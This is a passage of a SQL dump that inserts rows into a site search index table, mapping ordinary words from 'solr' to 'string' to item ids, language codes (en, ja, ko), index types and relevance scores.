('solr', 68, 'en', 'help_search', 12),
('solr', 68, 'ja', 'help_search', 12),
('solr', 68, 'ko', 'help_search', 12),
('solutions', 27, 'en', 'node_search', 0.792123),
('some', 1, 'en', 'help_search', 1),
('some', 1, 'ja', 'help_search', 1),
('some', 1, 'ko', 'help_search', 1),
('some', 3, 'en', 'node_search', 1),
('some', 3, 'ko', 'node_search', 1),
('some', 6, 'en', 'help_search', 1),
('some', 6, 'ja', 'help_search', 1),
('some', 6, 'ko', 'help_search', 1),
('some', 11, 'en', 'help_search', 2),
('some', 11, 'ja', 'help_search', 2),
('some', 11, 'ko', 'help_search', 2),
('some', 23, 'en', 'help_search', 1),
('some', 23, 'ja', 'help_search', 1),
('some', 23, 'ko', 'help_search', 1),
('some', 27, 'en', 'node_search', 1.74069),
('some', 28, 'en', 'help_search', 2.89945),
('some', 28, 'ja', 'help_search', 2.89945),
('some', 28, 'ko', 'help_search', 2.89945),
('some', 31, 'ja', 'help_search', 1.6522),
('some', 34, 'en', 'help_search', 1),
('some', 34, 'ja', 'help_search', 1),
('some', 34, 'ko', 'help_search', 1),
('some', 36, 'en', 'help_search', 1),
('some', 36, 'ja', 'help_search', 1),
('some', 36, 'ko', 'help_search', 1),
('some', 42, 'en', 'help_search', 2),
('some', 42, 'ja', 'help_search', 2),
('some', 42, 'ko', 'help_search', 2),
('some', 43, 'en', 'help_search', 4.73496),
('some', 43, 'ja', 'help_search', 4.73496),
('some', 43, 'ko', 'help_search', 4.73496),
('some', 48, 'en', 'help_search', 1),
('some', 48, 'ja', 'help_search', 1),
('some', 48, 'ko', 'help_search', 1),
('some', 50, 'en', 'help_search', 1),
('some', 50, 'ja', 'help_search', 1),
('some', 50, 'ko', 'help_search', 1),
('some', 59, 'en', 'help_search', 1),
('some', 59, 'ja', 'help_search', 1),
('some', 59, 'ko', 'help_search', 1),
('some', 60, 'en', 'help_search', 1),
('some', 60, 'ja', 'help_search', 1),
('some', 60, 'ko', 'help_search', 1),
('some', 61, 'en', 'help_search', 1),
('some', 61, 'ja', 'help_search', 1),
('some', 61, 'ko', 'help_search', 1),
('some', 65, 'en', 'help_search', 1),
('some', 65, 'ja', 'help_search', 1),
('some', 65, 'ko', 'help_search', 1),
('some', 67, 'en', 'help_search', 0.980874),
('some', 67, 'ja', 'help_search', 0.980874),
('some', 67, 'ko', 'help_search', 0.980874),
('some', 68, 'en', 'help_search', 1),
('some', 68, 'ja', 'help_search', 1),
('some', 68, 'ko', 'help_search', 1),
('some', 70, 'en', 'help_search', 1),
('some', 70, 'ja', 'help_search', 1),
('some', 70, 'ko', 'help_search', 1),
('some', 72, 'en', 'help_search', 2),
('some', 72, 'ja', 'help_search', 2),
('some', 72, 'ko', 'help_search', 2),
('some', 86, 'en', 'help_search', 1),
('some', 86, 'ja', 'help_search', 1),
('some', 86, 'ko', 'help_search', 1),
('some', 93, 'en', 'help_search', 1.8861),
('some', 93, 'ja', 'help_search', 1.8861),
('some', 93, 'ko', 'help_search', 1.8861),
('someone', 61, 'en', 'help_search', 1),
('someone', 61, 'ja', 'help_search', 1),
('someone', 61, 'ko', 'help_search', 1),
('sometimes', 38, 'en', 'help_search', 1),
('sometimes', 38, 'ja', 'help_search', 1),
('sometimes', 38, 'ko', 'help_search', 1),
('sometimes', 42, 'en', 'help_search', 1),
('sometimes', 42, 'ja', 'help_search', 1),
('sometimes', 42, 'ko', 'help_search', 1),
('sone', 89, 'en', 'node_search', 2),
('sone', 89, 'ja', 'node_search', 2),
('sone', 107, 'en', 'node_search', 28),
('sone', 107, 'ja', 'node_search', 31),
('sone', 115, 'en', 'node_search', 28),
('sone', 115, 'ja', 'node_search', 28),
('sons', 87, 'en', 'node_search', 1),
('soon', 27, 'ko', 'node_search', 1),
('soon', 76, 'en', 'help_search', 1),
('soon', 76, 'ja', 'help_search', 1),
('soon', 76, 'ko', 'help_search', 1),
('sort', 27, 'en', 'help_search', 1),
('sort', 27, 'ja', 'help_search', 1),
('sort', 27, 'ko', 'help_search', 1),
('sort', 61, 'en', 'help_search', 1),
('sort', 61, 'ja', 'help_search', 1),
('sort', 61, 'ko', 'help_search', 1),
('sort', 93, 'en', 'help_search', 4),
('sort', 93, 'ja', 'help_search', 4),
('sort', 93, 'ko', 'help_search', 4),
('sorting', 90, 'en', 'help_search', 1),
('sorting', 90, 'ja', 'help_search', 1),
('sorting', 90, 'ko', 'help_search', 1),
('sorting', 93, 'en', 'help_search', 1),
('sorting', 93, 'ja', 'help_search', 1),
('sorting', 93, 'ko', 'help_search', 1),
('sorts', 93, 'en', 'help_search', 0.869951),
('sorts', 93, 'ja', 'help_search', 0.869951),
('sorts', 93, 'ko', 'help_search', 0.869951),
('soumatome', 62, 'en', 'node_search', 0.879565),
('soung', 83, 'en', 'node_search', 2),
('soung', 83, 'ja', 'node_search', 2),
('soung', 115, 'en', 'node_search', 28),
('soung', 115, 'ja', 'node_search', 28),
('source', 28, 'en', 'help_search', 1),
('source', 28, 'ja', 'help_search', 1),
('source', 28, 'ko', 'help_search', 1),
('source', 30, 'en', 'help_search', 0.794753),
('source', 30, 'ja', 'help_search', 0.794753),
('source', 30, 'ko', 'help_search', 0.794753),
('source', 54, 'en', 'help_search', 8),
('source', 54, 'ja', 'help_search', 8),
('source', 54, 'ko', 'help_search', 8),
('source', 120, 'en', 'node_search', 4),
('source', 154, 'en', 'node_search', 1),
('sources', 54, 'en', 'help_search', 1),
('sources', 54, 'ja', 'help_search', 1),
('sources', 54, 'ko', 'help_search', 1),
('south', 3, 'en', 'node_search', 0.976851),
('south', 3, 'ko', 'node_search', 0.968904),
('south', 10, 'en', 'node_search', 28),
('south', 10, 'ko', 'node_search', 28),
('south', 31, 'en', 'node_search', 1),
('spaces', 28, 'en', 'help_search', 1),
('spaces', 28, 'ja', 'help_search', 1),
('spaces', 28, 'ko', 'help_search', 1),
('spam', 11, 'en', 'help_search', 1.91674),
('spam', 11, 'ja', 'help_search', 1.91674),
('spam', 11, 'ko', 'help_search', 1.91674),
('spamreduction', 11, 'en', 'help_search', 0.96498),
('spamreduction', 11, 'ja', 'help_search', 0.96498),
('spamreduction', 11, 'ko', 'help_search', 0.96498),
('spanfieldcontent', 205, 'en', 'node_search', 10),
('spanfieldcontent', 205, 'ja', 'node_search', 10),
('sparepart', 27, 'en', 'node_search', 1.3135),
('speak', 5, 'en', 'node_search', 1),
('speak', 5, 'ko', 'node_search', 1),
('speak', 18, 'en', 'node_search', 1),
('speak', 18, 'ko', 'node_search', 1),
('speak', 28, 'en', 'node_search', 1),
('speak', 30, 'en', 'node_search', 2),
('speakers', 138, 'en', 'node_search', 1),
('speaking', 87, 'en', 'node_search', 1),
('speaking', 138, 'en', 'node_search', 47),
('speaking', 138, 'ja', 'node_search', 27),
('special', 7, 'en', 'node_search', 29),
('special', 7, 'ko', 'node_search', 29),
('special', 66, 'en', 'node_search', 1),
('special', 84, 'en', 'help_search', 1),
('special', 84, 'ja', 'help_search', 1),
('special', 84, 'ko', 'help_search', 1),
('special', 155, 'en', 'node_search', 4),
('specific', 2, 'en', 'help_search', 1),
('specific', 2, 'ja', 'help_search', 1),
('specific', 2, 'ko', 'help_search', 1),
('specific', 11, 'en', 'help_search', 0.854391),
('specific', 11, 'ja', 'help_search', 0.854391),
('specific', 11, 'ko', 'help_search', 0.854391),
('specific', 13, 'en', 'help_search', 1),
('specific', 13, 'ja', 'help_search', 1),
('specific', 13, 'ko', 'help_search', 1),
('specific', 16, 'en', 'help_search', 1),
('specific', 16, 'ja', 'help_search', 1),
('specific', 16, 'ko', 'help_search', 1),
('specific', 20, 'en', 'help_search', 1),
('specific', 20, 'ja', 'help_search', 1),
('specific', 20, 'ko', 'help_search', 1),
('specific', 29, 'en', 'help_search', 0.945829),
('specific', 29, 'ja', 'help_search', 0.945829),
('specific', 29, 'ko', 'help_search', 0.945829),
('specific', 30, 'en', 'help_search', 0.683725),
('specific', 30, 'ja', 'help_search', 0.683725),
('specific', 30, 'ko', 'help_search', 0.683725),
('specific', 35, 'en', 'help_search', 0.96498),
('specific', 35, 'ja', 'help_search', 0.96498),
('specific', 35, 'ko', 'help_search', 0.96498),
('specific', 36, 'en', 'help_search', 1),
('specific', 36, 'ja', 'help_search', 1),
('specific', 36, 'ko', 'help_search', 1),
('specific', 38, 'en', 'help_search', 1),
('specific', 38, 'ja', 'help_search', 1),
('specific', 38, 'ko', 'help_search', 1),
('specific', 40, 'en', 'help_search', 1),
('specific', 40, 'ja', 'help_search', 1),
('specific', 40, 'ko', 'help_search', 1),
('specific', 41, 'en', 'help_search', 1),
('specific', 41, 'ja', 'help_search', 1),
('specific', 41, 'ko', 'help_search', 1),
('specific', 44, 'en', 'help_search', 1),
('specific', 44, 'ja', 'help_search', 1),
('specific', 44, 'ko', 'help_search', 1),
('specific', 59, 'en', 'help_search', 1),
('specific', 59, 'ja', 'help_search', 1),
('specific', 59, 'ko', 'help_search', 1),
('specific', 62, 'en', 'help_search', 1),
('specific', 62, 'ja', 'help_search', 1),
('specific', 62, 'ko', 'help_search', 1),
('specific', 65, 'en', 'help_search', 2),
('specific', 65, 'ja', 'help_search', 2),
('specific', 65, 'ko', 'help_search', 2),
('specific', 68, 'en', 'help_search', 0.78951),
('specific', 68, 'ja', 'help_search', 0.78951),
('specific', 68, 'ko', 'help_search', 0.78951),
('specific', 80, 'en', 'help_search', 0.899454),
('specific', 80, 'ja', 'help_search', 0.899454),
('specific', 80, 'ko', 'help_search', 0.899454),
('specific', 93, 'en', 'help_search', 2.60924),
('specific', 93, 'ja', 'help_search', 2.60924),
('specific', 93, 'ko', 'help_search', 2.60924),
('specifically', 2, 'en', 'help_search', 1),
('specifically', 2, 'ja', 'help_search', 1),
('specifically', 2, 'ko', 'help_search', 1),
('specification', 44, 'en', 'help_search', 11),
('specification', 44, 'ja', 'help_search', 11),
('specification', 44, 'ko', 'help_search', 11),
('specified', 154, 'en', 'node_search', 29),
('specified', 155, 'en', 'node_search', 2),
('specified', 156, 'en', 'node_search', 29),
('specified', 157, 'en', 'node_search', 29),
('specified', 160, 'en', 'node_search', 5),
('specified', 161, 'en', 'node_search', 5),
('specified', 162, 'en', 'node_search', 4),
('specified', 163, 'en', 'node_search', 5),
('specified', 164, 'en', 'node_search', 2),
('specified', 165, 'en', 'node_search', 2),
('specified', 166, 'en', 'node_search', 5),
('specified', 167, 'en', 'node_search', 2),
('specified', 168, 'en', 'node_search', 2),
('specified', 169, 'en', 'node_search', 5),
('specified', 170, 'en', 'node_search', 5),
('specified', 171, 'en', 'node_search', 5),
('specified', 173, 'en', 'node_search', 5),
('specified', 174, 'en', 'node_search', 2),
('specified', 175, 'en', 'node_search', 2),
('specified', 176, 'en', 'node_search', 2),
('specified', 177, 'en', 'node_search', 2),
('specified', 178, 'en', 'node_search', 2),
('specified', 179, 'en', 'node_search', 2),
('specified', 180, 'en', 'node_search', 2),
('specified', 184, 'en', 'node_search', 2),
('specified', 185, 'en', 'node_search', 2),
('specified', 186, 'en', 'node_search', 2),
('specified', 187, 'en', 'node_search', 5),
('specified', 188, 'en', 'node_search', 2),
('specified', 189, 'en', 'node_search', 5),
('specified', 190, 'en', 'node_search', 5),
('specified', 191, 'en', 'node_search', 5),
('specified', 192, 'en', 'node_search', 2),
('specified', 193, 'en', 'node_search', 5),
('specified', 194, 'en', 'node_search', 5),
('specified', 195, 'en', 'node_search', 2),
('specified', 196, 'en', 'node_search', 5),
('specified', 197, 'en', 'node_search', 5),
('specified', 198, 'en', 'node_search', 2),
('specified', 199, 'en', 'node_search', 5),
('specify', 93, 'en', 'help_search', 2),
('specify', 93, 'ja', 'help_search', 2),
('specify', 93, 'ko', 'help_search', 2),
('specifying', 31, 'ja', 'help_search', 0.942091),
('specifying', 68, 'en', 'help_search', 1),
('specifying', 68, 'ja', 'help_search', 1),
('specifying', 68, 'ko', 'help_search', 1),
('speeches', 9, 'en', 'node_search', 3),
('speeches', 17, 'en', 'node_search', 4),
('speed', 37, 'en', 'help_search', 1),
('speed', 37, 'ja', 'help_search', 1),
('speed', 37, 'ko', 'help_search', 1),
('speed', 62, 'en', 'node_search', 1.80574),
('sphinx', 68, 'en', 'help_search', 11),
('sphinx', 68, 'ja', 'help_search', 11),
('sphinx', 68, 'ko', 'help_search', 11),
('spot', 66, 'en', 'node_search', 4),
('square', 86, 'en', 'help_search', 1),
('square', 86, 'ja', 'help_search', 1),
('square', 86, 'ko', 'help_search', 1),
('stable', 29, 'en', 'help_search', 1),
('stable', 29, 'ja', 'help_search', 1),
('stable', 29, 'ko', 'help_search', 1),
('stable', 33, 'en', 'help_search', 1),
('stable', 33, 'ja', 'help_search', 1),
('stable', 33, 'ko', 'help_search', 1),
('stable', 38, 'en', 'help_search', 1),
('stable', 38, 'ja', 'help_search', 1),
('stable', 38, 'ko', 'help_search', 1),
('staff', 27, 'en', 'node_search', 2.34008),
('stage', 184, 'en', 'node_search', 1),
('stage', 185, 'en', 'node_search', 28),
('stage', 191, 'en', 'node_search', 1),
('stage', 193, 'en', 'node_search', 1),
('stage', 195, 'en', 'node_search', 1),
('stage', 197, 'en', 'node_search', 1),
('stage', 199, 'en', 'node_search', 1),
('stages', 178, 'en', 'node_search', 1),
('stages', 186, 'en', 'node_search', 1),
('stages', 198, 'en', 'node_search', 1),
('staging', 30, 'en', 'help_search', 1),
('staging', 30, 'ja', 'help_search', 1),
('staging', 30, 'ko', 'help_search', 1),
('stand', 62, 'en', 'node_search', 1),
('standard', 30, 'en', 'help_search', 0.980874),
('standard', 30, 'ja', 'help_search', 0.980874),
('standard', 30, 'ko', 'help_search', 0.980874),
('standards', 6, 'en', 'help_search', 10.2817),
('standards', 6, 'ja', 'help_search', 10.2817),
('standards', 6, 'ko', 'help_search', 10.2817),
('standards', 24, 'en', 'node_search', 0.857458),
('standards', 26, 'en', 'node_search', 2),
('standards', 27, 'en', 'node_search', 1),
('standards', 42, 'en', 'help_search', 1),
('standards', 42, 'ja', 'help_search', 1),
('standards', 42, 'ko', 'help_search', 1),
('standards', 46, 'en', 'help_search', 10.2817),
('standards', 46, 'ja', 'help_search', 10.2817),
('standards', 46, 'ko', 'help_search', 10.2817),
('standed', 27, 'en', 'node_search', 0.863659),
('star', 69, 'en', 'help_search', 1),
('star', 69, 'ja', 'help_search', 1),
('star', 69, 'ko', 'help_search', 1),
('stars', 18, 'en', 'node_search', 28),
('stars', 18, 'ko', 'node_search', 28),
('start', 11, 'en', 'help_search', 1),
('start', 11, 'ja', 'help_search', 1),
('start', 11, 'ko', 'help_search', 1),
('start', 56, 'en', 'help_search', 1),
('start', 56, 'ja', 'help_search', 1),
('start', 56, 'ko', 'help_search', 1),
('start', 92, 'en', 'help_search', 4),
('start', 92, 'ja', 'help_search', 4),
('start', 92, 'ko', 'help_search', 4),
('start', 155, 'en', 'node_search', 1),
('started', 22, 'en', 'help_search', 0.953396),
('started', 22, 'ja', 'help_search', 0.953396),
('started', 22, 'ko', 'help_search', 0.953396),
('started', 23, 'en', 'node_search', 2),
('started', 27, 'en', 'node_search', 2),
('started', 28, 'en', 'node_search', 28),
('starting', 62, 'en', 'node_search', 30.867),
('starting', 66, 'en', 'node_search', 1),
('starting', 72, 'en', 'help_search', 1),
('starting', 72, 'ja', 'help_search', 1),
('starting', 72, 'ko', 'help_search', 1),
('starting', 175, 'en', 'node_search', 27),
('starts', 63, 'en', 'help_search', 1),
('starts', 63, 'ja', 'help_search', 1),
('starts', 63, 'ko', 'help_search', 1),
('starts', 68, 'en', 'help_search', 1),
('starts', 68, 'ja', 'help_search', 1),
('starts', 68, 'ko', 'help_search', 1),
('starts', 81, 'en', 'help_search', 1),
('starts', 81, 'ja', 'help_search', 1),
('starts', 81, 'ko', 'help_search', 1),
('starts', 174, 'en', 'node_search', 1),
('starts', 177, 'en', 'node_search', 1),
('state', 31, 'ja', 'help_search', 6),
('state', 42, 'en', 'help_search', 1),
('state', 42, 'ja', 'help_search', 1),
('state', 42, 'ko', 'help_search', 1),
('states', 24, 'en', 'node_search', 1),
('states', 27, 'en', 'node_search', 1),
('station', 27, 'en', 'node_search', 0.727213),
('status', 45, 'en', 'help_search', 1),
('status', 45, 'ja', 'help_search', 1),
('status', 45, 'ko', 'help_search', 1),
('status', 47, 'en', 'help_search', 1),
('status', 47, 'ja', 'help_search', 1),
('status', 47, 'ko', 'help_search', 1),
('status', 53, 'en', 'help_search', 28),
('status', 53, 'ja', 'help_search', 28),
('status', 53, 'ko', 'help_search', 28),
('status', 61, 'en', 'help_search', 4),
('status', 61, 'ja', 'help_search', 4),
('status', 61, 'ko', 'help_search', 4),
('status', 66, 'en', 'help_search', 4),
('status', 66, 'ja', 'help_search', 4),
('status', 67, 'en', 'help_search', 1.76896),
('status', 67, 'ja', 'help_search', 1.76896),
('status', 67, 'ko', 'help_search', 1.76896),
('status', 76, 'en', 'help_search', 6),
('status', 76, 'ja', 'help_search', 6),
('status', 76, 'ko', 'help_search', 6),
('stay', 66, 'en', 'node_search', 1),
('stemmer', 68, 'en', 'help_search', 10.7896),
('stemmer', 68, 'ja', 'help_search', 10.7896),
('stemmer', 68, 'ko', 'help_search', 10.7896),
('stemming', 68, 'en', 'help_search', 1),
('stemming', 68, 'ja', 'help_search', 1),
('stemming', 68, 'ko', 'help_search', 1),
('step', 23, 'en', 'help_search', 0.98493),
('step', 23, 'ja', 'help_search', 0.98493),
('step', 23, 'ko', 'help_search', 0.98493),
('step', 28, 'en', 'help_search', 1),
('step', 28, 'ja', 'help_search', 1),
('step', 28, 'ko', 'help_search', 1),
('step', 70, 'en', 'help_search', 1),
('step', 70, 'ja', 'help_search', 1),
('step', 70, 'ko', 'help_search', 1),
('step', 160, 'en', 'node_search', 4),
('step', 169, 'en', 'node_search', 1),
('step', 171, 'en', 'node_search', 1),
('step', 173, 'en', 'node_search', 1),
('step', 174, 'en', 'node_search', 1),
('step', 175, 'en', 'node_search', 1),
('step', 177, 'en', 'node_search', 1),
('step', 178, 'en', 'node_search', 27),
('step', 180, 'en', 'node_search', 1),
('step', 185, 'en', 'node_search', 1),
('step', 187, 'en', 'node_search', 1),
('step', 190, 'en', 'node_search', 1),
('step', 193, 'en', 'node_search', 1),
('step', 194, 'en', 'node_search', 1),
('step', 196, 'en', 'node_search', 2),
('step', 198, 'en', 'node_search', 1),
('stepbystep', 46, 'en', 'help_search', 0.949597),
('stepbystep', 46, 'ja', 'help_search', 0.949597),
('stepbystep', 46, 'ko', 'help_search', 0.949597),
('stepping', 170, 'en', 'node_search', 1),
('steps', 1, 'en', 'help_search', 19),
('steps', 1, 'ja', 'help_search', 19),
('steps', 1, 'ko', 'help_search', 19),
('steps', 3, 'en', 'help_search', 19),
('steps', 3, 'ja', 'help_search', 19),
('steps', 3, 'ko', 'help_search', 19),
('steps', 4, 'en', 'help_search', 19),
('steps', 4, 'ja', 'help_search', 19),
('steps', 4, 'ko', 'help_search', 19),
('steps', 5, 'en', 'help_search', 19),
('steps', 5, 'ja', 'help_search', 19),
('steps', 5, 'ko', 'help_search', 19),
('steps', 6, 'en', 'help_search', 2),
('steps', 6, 'ja', 'help_search', 2),
('steps', 6, 'ko', 'help_search', 2),
('steps', 7, 'en', 'help_search', 21),
('steps', 7, 'ja', 'help_search', 21),
('steps', 7, 'ko', 'help_search', 21),
('steps', 8, 'en', 'help_search', 20),
('steps', 8, 'ja', 'help_search', 20),
('steps', 8, 'ko', 'help_search', 20),
('steps', 9, 'en', 'help_search', 19),
('steps', 9, 'ja', 'help_search', 19),
('steps', 9, 'ko', 'help_search', 19),
('steps', 10, 'en', 'help_search', 19),
('steps', 10, 'ja', 'help_search', 19),
('steps', 10, 'ko', 'help_search', 19),
('steps', 12, 'en', 'help_search', 19),
('steps', 12, 'ja', 'help_search', 19),
('steps', 12, 'ko', 'help_search', 19),
('steps', 13, 'en', 'help_search', 19),
('steps', 13, 'ja', 'help_search', 19),
('steps', 13, 'ko', 'help_search', 19),
('steps', 14, 'en', 'help_search', 19),
('steps', 14, 'ja', 'help_search', 19),
('steps', 14, 'ko', 'help_search', 19),
('steps', 15, 'en', 'help_search', 19),
('steps', 15, 'ja', 'help_search', 19),
('steps', 15, 'ko', 'help_search', 19),
('steps', 16, 'en', 'help_search', 19),
('steps', 16, 'ja', 'help_search', 19),
('steps', 16, 'ko', 'help_search', 19),
('steps', 17, 'en', 'help_search', 19),
('steps', 17, 'ja', 'help_search', 19),
('steps', 17, 'ko', 'help_search', 19),
('steps', 18, 'en', 'help_search', 20),
('steps', 18, 'ja', 'help_search', 20),
('steps', 18, 'ko', 'help_search', 20),
('steps', 19, 'en', 'help_search', 20),
('steps', 19, 'ja', 'help_search', 20),
('steps', 19, 'ko', 'help_search', 20),
('steps', 21, 'en', 'help_search', 19),
('steps', 21, 'ja', 'help_search', 19),
('steps', 21, 'ko', 'help_search', 19),
('steps', 22, 'en', 'help_search', 19),
('steps', 22, 'ja', 'help_search', 19),
('steps', 22, 'ko', 'help_search', 19),
('steps', 23, 'en', 'help_search', 20.9545),
('steps', 23, 'ja', 'help_search', 20.9545),
('steps', 23, 'ko', 'help_search', 20.9545),
('steps', 24, 'en', 'help_search', 19),
('steps', 24, 'ja', 'help_search', 19),
('steps', 24, 'ko', 'help_search', 19),
('steps', 25, 'en', 'help_search', 20),
('steps', 25, 'ja', 'help_search', 20),
('steps', 26, 'en', 'help_search', 20),
('steps', 26, 'ja', 'help_search', 20),
('steps', 26, 'ko', 'help_search', 20),
('steps', 27, 'en', 'help_search', 19),
('steps', 27, 'ja', 'help_search', 19),
('steps', 27, 'ko', 'help_search', 19),
('steps', 28, 'en', 'help_search', 19.644),
('steps', 28, 'ja', 'help_search', 19.644),
('steps', 28, 'ko', 'help_search', 19.644),
('steps', 32, 'en', 'help_search', 19),
('steps', 32, 'ja', 'help_search', 19),
('steps', 32, 'ko', 'help_search', 19),
('steps', 35, 'en', 'help_search', 1),
('steps', 35, 'ja', 'help_search', 1),
('steps', 35, 'ko', 'help_search', 1),
('steps', 39, 'en', 'help_search', 20),
('steps', 39, 'ja', 'help_search', 20),
('steps', 39, 'ko', 'help_search', 20),
('steps', 45, 'en', 'help_search', 20),
('steps', 45, 'ja', 'help_search', 20),
('steps', 45, 'ko', 'help_search', 20),
('steps', 46, 'en', 'help_search', 1),
('steps', 46, 'ja', 'help_search', 1),
('steps', 46, 'ko', 'help_search', 1),
('steps', 48, 'en', 'help_search', 20),
('steps', 48, 'ja', 'help_search', 20),
('steps', 48, 'ko', 'help_search', 20),
('steps', 49, 'en', 'help_search', 19),
('steps', 49, 'ja', 'help_search', 19),
('steps', 49, 'ko', 'help_search', 19);
INSERT INTO `search_index` (`word`, `sid`, `langcode`, `type`, `score`) VALUES
('steps', 50, 'en', 'help_search', 19),
('steps', 50, 'ja', 'help_search', 19),
('steps', 50, 'ko', 'help_search', 19),
('steps', 51, 'en', 'help_search', 19),
('steps', 51, 'ja', 'help_search', 19),
('steps', 51, 'ko', 'help_search', 19),
('steps', 52, 'en', 'help_search', 20),
('steps', 52, 'ja', 'help_search', 20),
('steps', 52, 'ko', 'help_search', 20),
('steps', 53, 'en', 'help_search', 19),
('steps', 53, 'ja', 'help_search', 19),
('steps', 53, 'ko', 'help_search', 19),
('steps', 54, 'en', 'help_search', 19),
('steps', 54, 'ja', 'help_search', 19),
('steps', 54, 'ko', 'help_search', 19),
('steps', 55, 'en', 'help_search', 19),
('steps', 55, 'ja', 'help_search', 19),
('steps', 55, 'ko', 'help_search', 19),
('steps', 56, 'en', 'help_search', 19),
('steps', 56, 'ja', 'help_search', 19),
('steps', 56, 'ko', 'help_search', 19),
('steps', 57, 'en', 'help_search', 19),
('steps', 57, 'ja', 'help_search', 19),
('steps', 57, 'ko', 'help_search', 19),
('steps', 58, 'en', 'help_search', 19),
('steps', 58, 'ja', 'help_search', 19),
('steps', 58, 'ko', 'help_search', 19),
('steps', 59, 'en', 'help_search', 19),
('steps', 59, 'ja', 'help_search', 19),
('steps', 59, 'ko', 'help_search', 19),
('steps', 60, 'en', 'help_search', 20),
('steps', 60, 'ja', 'help_search', 20),
('steps', 60, 'ko', 'help_search', 20),
('steps', 61, 'en', 'help_search', 19),
('steps', 61, 'ja', 'help_search', 19),
('steps', 61, 'ko', 'help_search', 19),
('steps', 63, 'en', 'help_search', 21),
('steps', 63, 'ja', 'help_search', 21),
('steps', 63, 'ko', 'help_search', 21),
('steps', 64, 'en', 'help_search', 19),
('steps', 64, 'ja', 'help_search', 19),
('steps', 64, 'ko', 'help_search', 19),
('steps', 66, 'en', 'help_search', 20),
('steps', 66, 'ja', 'help_search', 20),
('steps', 67, 'en', 'help_search', 19.9132),
('steps', 67, 'ja', 'help_search', 19.9132),
('steps', 67, 'ko', 'help_search', 19.9132),
('steps', 69, 'en', 'help_search', 19),
('steps', 69, 'ja', 'help_search', 19),
('steps', 69, 'ko', 'help_search', 19),
('steps', 70, 'en', 'help_search', 19),
('steps', 70, 'ja', 'help_search', 19),
('steps', 70, 'ko', 'help_search', 19),
('steps', 71, 'en', 'help_search', 20),
('steps', 71, 'ja', 'help_search', 20),
('steps', 71, 'ko', 'help_search', 20),
('steps', 72, 'en', 'help_search', 19),
('steps', 72, 'ja', 'help_search', 19),
('steps', 72, 'ko', 'help_search', 19),
('steps', 73, 'en', 'help_search', 19),
('steps', 73, 'ja', 'help_search', 19),
('steps', 73, 'ko', 'help_search', 19),
('steps', 74, 'en', 'help_search', 19),
('steps', 74, 'ja', 'help_search', 19),
('steps', 74, 'ko', 'help_search', 19),
('steps', 75, 'en', 'help_search', 19),
('steps', 75, 'ja', 'help_search', 19),
('steps', 75, 'ko', 'help_search', 19),
('steps', 76, 'en', 'help_search', 19),
('steps', 76, 'ja', 'help_search', 19),
('steps', 76, 'ko', 'help_search', 19),
('steps', 77, 'en', 'help_search', 19),
('steps', 77, 'ja', 'help_search', 19),
('steps', 77, 'ko', 'help_search', 19),
('steps', 78, 'en', 'help_search', 19),
('steps', 78, 'ja', 'help_search', 19),
('steps', 78, 'ko', 'help_search', 19),
('steps', 79, 'en', 'help_search', 19),
('steps', 79, 'ja', 'help_search', 19),
('steps', 79, 'ko', 'help_search', 19),
('steps', 81, 'en', 'help_search', 19),
('steps', 81, 'ja', 'help_search', 19),
('steps', 81, 'ko', 'help_search', 19),
('steps', 82, 'en', 'help_search', 20),
('steps', 82, 'ja', 'help_search', 20),
('steps', 82, 'ko', 'help_search', 20),
('steps', 83, 'en', 'help_search', 19),
('steps', 83, 'ja', 'help_search', 19),
('steps', 83, 'ko', 'help_search', 19),
('steps', 85, 'en', 'help_search', 19),
('steps', 85, 'ja', 'help_search', 19),
('steps', 85, 'ko', 'help_search', 19),
('steps', 86, 'en', 'help_search', 19),
('steps', 86, 'ja', 'help_search', 19),
('steps', 86, 'ko', 'help_search', 19),
('steps', 87, 'en', 'help_search', 19),
('steps', 87, 'ja', 'help_search', 19),
('steps', 87, 'ko', 'help_search', 19),
('steps', 88, 'en', 'help_search', 20),
('steps', 88, 'ja', 'help_search', 20),
('steps', 88, 'ko', 'help_search', 20),
('steps', 89, 'en', 'help_search', 19),
('steps', 89, 'ja', 'help_search', 19),
('steps', 89, 'ko', 'help_search', 19),
('steps', 90, 'en', 'help_search', 20),
('steps', 90, 'ja', 'help_search', 20),
('steps', 90, 'ko', 'help_search', 20),
('steps', 91, 'en', 'help_search', 19),
('steps', 91, 'ja', 'help_search', 19),
('steps', 91, 'ko', 'help_search', 19),
('steps', 92, 'en', 'help_search', 19),
('steps', 92, 'ja', 'help_search', 19),
('steps', 92, 'ko', 'help_search', 19),
('still', 33, 'en', 'help_search', 1),
('still', 33, 'ja', 'help_search', 1),
('still', 33, 'ko', 'help_search', 1),
('stone', 170, 'en', 'node_search', 1),
('storage', 30, 'en', 'help_search', 2),
('storage', 30, 'ja', 'help_search', 2),
('storage', 30, 'ko', 'help_search', 2),
('store', 11, 'en', 'help_search', 1),
('store', 11, 'ja', 'help_search', 1),
('store', 11, 'ko', 'help_search', 1),
('store', 54, 'en', 'help_search', 2),
('store', 54, 'ja', 'help_search', 2),
('store', 54, 'ko', 'help_search', 2),
('store', 62, 'en', 'help_search', 1),
('store', 62, 'ja', 'help_search', 1),
('store', 62, 'ko', 'help_search', 1),
('store', 67, 'en', 'help_search', 1),
('store', 67, 'ja', 'help_search', 1),
('store', 67, 'ko', 'help_search', 1),
('stored', 29, 'en', 'help_search', 1),
('stored', 29, 'ja', 'help_search', 1),
('stored', 29, 'ko', 'help_search', 1),
('stored', 30, 'en', 'help_search', 1.76676),
('stored', 30, 'ja', 'help_search', 1.76676),
('stored', 30, 'ko', 'help_search', 1.76676),
('stored', 31, 'ja', 'help_search', 2.49525),
('stored', 44, 'en', 'help_search', 1),
('stored', 44, 'ja', 'help_search', 1),
('stored', 44, 'ko', 'help_search', 1),
('stored', 54, 'en', 'help_search', 1),
('stored', 54, 'ja', 'help_search', 1),
('stored', 54, 'ko', 'help_search', 1),
('stores', 31, 'ja', 'help_search', 11.822),
('storied', 27, 'en', 'node_search', 1.39936),
('storyed', 27, 'en', 'node_search', 1),
('strange', 3, 'en', 'node_search', 1),
('strange', 3, 'ko', 'node_search', 1),
('streamed', 37, 'en', 'help_search', 0.916736),
('streamed', 37, 'ja', 'help_search', 0.916736),
('streamed', 37, 'ko', 'help_search', 0.916736),
('strength', 27, 'en', 'node_search', 0.906287),
('strictly', 77, 'en', 'node_search', 4),
('strictly', 87, 'en', 'node_search', 1),
('string', 45, 'en', 'help_search', 1),
('string', 45, 'ja', 'help_search', 1),
('string', 45, 'ko', 'help_search', 1),
('string', 52, 'en', 'help_search', 1),
('string', 52, 'ja', 'help_search', 1),
('string', 52, 'ko', 'help_search', 1),
('string', 71, 'en', 'help_search', 4),
